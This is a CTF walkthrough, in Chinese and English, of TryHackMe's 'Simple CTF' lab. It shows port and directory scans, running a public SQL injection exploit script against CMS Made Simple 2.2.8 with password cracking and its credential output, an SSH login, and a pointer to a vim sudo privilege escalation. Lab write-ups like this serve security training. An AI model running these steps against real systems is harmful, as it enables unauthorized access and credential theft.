【THM】Simple CTF-Practice

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/easyctf

Difficulty: Easy

端口扫描

1
nmap -p- -sC -sV -T4 10.10.246.59

image-20231114214301816

From our results, we can see ports 21 (FTP), 80 (HTTP), and 2222 (SSH) are open.

First, let’s just browse to the IP and see what we get

image-20231114214547600

We find it is the default Apache2 page, not much more to go off of here.

1
gobuster dir --url http://10.10.246.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Using the medium wordlist we supplied, gobuster was able to find there is a webpage at “/simple”. Let’s try browsing to it now and see what we find

image-20231114215654857

image-20231114215923616

Here we can see this is a default page for something called “CMS Made Simple” and if we look in the bottom corner we can see it is version 2.2.8.

Let’s see if there is anything online about this particular version by simply going to Google and searching “CMS Made Simple 2.2.8 exploit”.

https://www.exploit-db.com/exploits/46635

image-20231114220012331

The exploit is a python script so I copied and pasted into a .py document on my attack box.

或者

image-20231114220933861

image-20231114221156705

运行的时候发现少了-u这个参数

image-20231114222606989

此脚本在 CMS 站点上执行 SQLi,其目标是返回其用户凭据

1
2
3
python 46635.py -u http://10.10.246.59/simple

python 46635.py -u http://10.10.246.59/simple --crack -w /usr/share/wordlists/rockyou.txt

不知道为什么我爆破的和wp不一样

1
2
3
4
5
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Bingo! We got a username and a cracked password returned from the exploit.

ssh

image-20231114232105420

image-20231114232224874

Is there any other user in the home directory? What’s its name?

answer: sunbath

image-20231114232307877

提权

On to privileged escalation! First I like to start off with running “sudo -l” to see what my current user can run.

1
sudo -l

image-20231114232956886

https://gtfobins.github.io/gtfobins/vim/

image-20231114233222696

image-20231114233243098

image-20231114233344682